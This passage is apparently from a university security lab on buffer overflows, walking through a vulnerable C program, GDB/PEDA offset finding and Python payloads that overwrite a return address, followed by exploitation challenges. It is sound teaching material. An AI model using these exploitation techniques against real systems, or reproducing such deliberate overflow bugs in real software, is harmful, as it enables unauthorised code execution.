 +{
 +    fgets(buf, 100, stdin);
 +}
 +
 +int main(int argc, char* argv[])
 +{
 +    char local_buffer[32];
 +
 +    printf("Please leave a message: ");
 +    get_message(local_buffer);
 +
 +    f();
 +
 +    return 0;
 +}
 +</code>
 +
 +First, let's trigger the program to crash like in the previous example:
 +
 +<code bash>
 +$ ./buffer_overflow_ret 
 +Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 +Nothing to see here
 +Segmentation fault (core dumped)
 +</code>
 +
 +However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern.
 +
 +<code bash>
 +$ gdb ./buffer_overflow_ret 
 +gdb-peda$ pattc 100
 +'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
 +gdb-peda$ r
 +Starting program: ./buffer_overflow_ret
 +Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
 +Nothing to see here
 +
 +Program received signal SIGSEGV, Segmentation fault.
 +
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x804b160 ("Nothing to see here\nge: ")
 +EDX: 0xf7fb5890 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x61414145 ('EAAa')
 +ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +EIP: 0x41304141 ('AA0A')
 +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +Invalid $PC address: 0x41304141
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +Stopped reason: SIGSEGV
 +0x41304141 in ?? ()
 +
 +gdb-peda$ patto AA0A
 +AA0A found at offset: 40
 +</code>
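
The lookup that ''patto'' performs can also be reproduced by hand. The Python 3 sketch below uses the pattern printed by ''pattc 100'' above and the register values from the crash; ''offset_of'' is a hypothetical helper that converts a register value back to its four little-endian bytes and searches for them in the pattern.

```python
import struct

# Pattern copied from the `pattc 100` output above
PATTERN = (b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAG"
           b"AAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")


def offset_of(register_value, pattern=PATTERN):
    """Offset of the 4 bytes that ended up in a 32-bit register, or -1."""
    needle = struct.pack("<I", register_value)
    return pattern.find(needle)


eip_offset = offset_of(0x41304141)  # EIP at the time of the crash
ebp_offset = offset_of(0x61414145)  # EBP at the time of the crash

print(eip_offset, ebp_offset)
```

The saved frame pointer is found 4 bytes before the return address, which is consistent with the usual frame layout.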
 +
 +This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write ''0xdeadbeef'' first.
 +
 +<code python>
 +#!/usr/bin/env python
 +import struct
 +
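 +# 40 bytes of padding (the offset reported by patto), then the new return address
 +payload = b'a' * 40
 +payload += struct.pack('<I', 0xdeadbeef)
 +
 +with open('payload', 'wb') as f:
 +    f.write(payload)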
 +</code>
 +
 +<code bash>
 +gdb-peda$ r < payload
 +Starting program: ./buffer_overflow_ret < payload
 +Please leave a message: Nothing to see here
 +
 +Program received signal SIGSEGV, Segmentation fault.
 +
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
 +EDX: 0xf7fb5890 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x61616161 ('aaaa')
 +ESP: 0xffffd620 --> 0x0 
 +EIP: 0xdeadbeef
 +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +Invalid $PC address: 0xdeadbeef
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd620 --> 0x0 
 +0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
 +0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +0012| 0xffffd62c --> 0xffffd644 --> 0x0 
 +0016| 0xffffd630 --> 0x1 
 +0020| 0xffffd634 --> 0x0 
 +0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c 
 +0028| 0xffffd63c --> 0xf7fe575a (add    edi,0x178a6)
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +Stopped reason: SIGSEGV
 +0xdeadbeef in ?? ()
 +</code>
 +
 +Excellent. Now we can replace ''0xdeadbeef'' with the address of the ''win'' function.
 +
 +<code python>
 +...
 +payload += struct.pack('<I', 0x080484b6)
 +...
 +</code>
 +
 +<code>
 +$ cat payload | ./buffer_overflow_ret 
 +Please leave a message: Nothing to see here
 +Well done!
 +Segmentation fault (core dumped)
 +</code>
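
The payload scripts in this section differ only in the padding length and the target address, so the construction can be factored into a small helper. This is a minimal Python 3 sketch; ''build_payload'' is a hypothetical name, the offset ''40'' is the one reported by ''patto'', and ''0x080484b6'' is the address used in the script above.

```python
import struct


def build_payload(offset, target, filler=b"a"):
    """Padding up to the saved return address, then the new 32-bit address."""
    return filler * offset + struct.pack("<I", target)


payload = build_payload(40, 0x080484b6)

print(len(payload))
print(payload[40:])
```

Writing the result to a file in binary mode (''open('payload', 'wb')'') gives the same kind of file used in the runs above.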
 +
 +Our job here is done. Now it's time for you to smash some stacks.
 +
 +<note tip>
 +Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.
 +</note>
 +
 +===== Challenges =====
 +
 +<note important>
 +Before venturing forth, consider the following roadmap when approaching a challenge:
 +  * disassemble the binary
 +  * identify the stack buffer
 +  * identify functions which work with buffers
 +  * see if there are any mismatches (declared size vs. index used)
 +  * dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
 +  * determine offset in buffer
 +  * write a script which generates a payload to reliably crash/exploit the target
 +  * keep stdin/connection open for further interaction after obtaining a shell
 +  * ???
 +  * PROFIT
 +
 +</note>
 +
 +Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]].
 +
 +==== 01. Parrot ====
 +
 +Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the "canary" can conclude that stack data has been corrupted throughout the execution of the current function.
 +
 +We have implemented our very own ''parrot''. Can you avoid it somehow?
 +
 +<note tip>
 +Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''.
 +</note>
 +
 +<note tip>
 +When providing input to a program and wanting to maintain connection to its standard input, run:
 +<code>
 +cat payload - | ./program
 +</code>
 +
 +Or, if you have a payload generator program such as ''payload.py'', run:
 +<code>
 +cat <(python payload.py) - | ./program
 +</code>
 +</note>
 +
 +==== 02. Indexing ====
 +
 +More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] library comes in.
 +
 +Here's an interactive script to get you started:
 +
 +<code python exploit.py>
 +#!/usr/bin/env python
 +from pwn import *
 +
 +p = process('./indexing')
 +
 +p.recvuntil('Index: ')
 +p.sendline() # TODO (must be string)
 +
 +# Give value
 +p.recvuntil('Value: ')
 +p.sendline() # TODO (must be string)
 +p.interactive()
 +</code>
 +
 +<note tip>
 +Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
 +</note>
 +
 +<note tip>
 +You can inspect the behavior of a program for a given input by doing:
 +<code>
 +cat payload | strace ./program
 +</code>
 +That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input.
 +</note>
 +==== 03. Smashthestack Level7 ====
 +
 +Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.
 +
 +<note tip>
 +There's an integer overflow + buffer overflow in the program.
 +</note>
 +
 +<note tip>
 +What are the four 32 bit values that multiplied by ''4'' give you, let's say, ''256''?
 +</note>
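
The integer overflow mentioned in the hints comes from arithmetic on fixed-width integers. As a hedged illustration in Python 3 (whose integers do not wrap on their own), the hypothetical helper ''mul32'' masks the product to 32 bits, which mirrors an unsigned 32-bit multiplication in C. The operands are arbitrary examples, not the solution to the challenge.

```python
MASK32 = 0xFFFFFFFF


def mul32(a, b):
    """Multiply like an unsigned 32-bit C integer: keep only the low 32 bits."""
    return (a * b) & MASK32


print(mul32(10, 4))
print(hex(mul32(0x40000001, 4)))
```

A large operand can therefore produce a small product, which is what makes a size check based on the multiplied value unreliable.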
 +
 +<note tip>
 +In order to run a program that receives command line arguments under gdb, you can do the following:
 +
 +<code gdb>
 +$ gdb ./main
 +gdb$ set args arg1 arg2 arg3
 +gdb$ start
 +</code> 
 +</note>
 +==== 04. Neighbourly ====
 +
 +Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.
 +
 +<note tip>
 +The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function.
 +</note>
 +
 +==== 05. Uninitialized ====
 +
 +There's something faulty in the program, and it's **not** a buffer overflow. Provide the proper input to the executable and get a shell.
 +
 +<note tip>
 +Do **not** use pwntools for this task.
 +</note>
 +==== 06. Bonus: Uninitialized 2 ====
 +
 +There's a small update to the ''uninitialized'' executable and you need to update your solution.
 +
 +<note tip>
 +Use ''ltrace'' to understand what's happening differently.
 +</note>
 +
 +<note important>
 +Create a pwntools-based script to solve both the initial executable and the bonus one.
 +</note>
 +
 +==== 07. Bonus: Birds ====
 +
 +Time for a more complex challenge. Be patient and don't speed through it.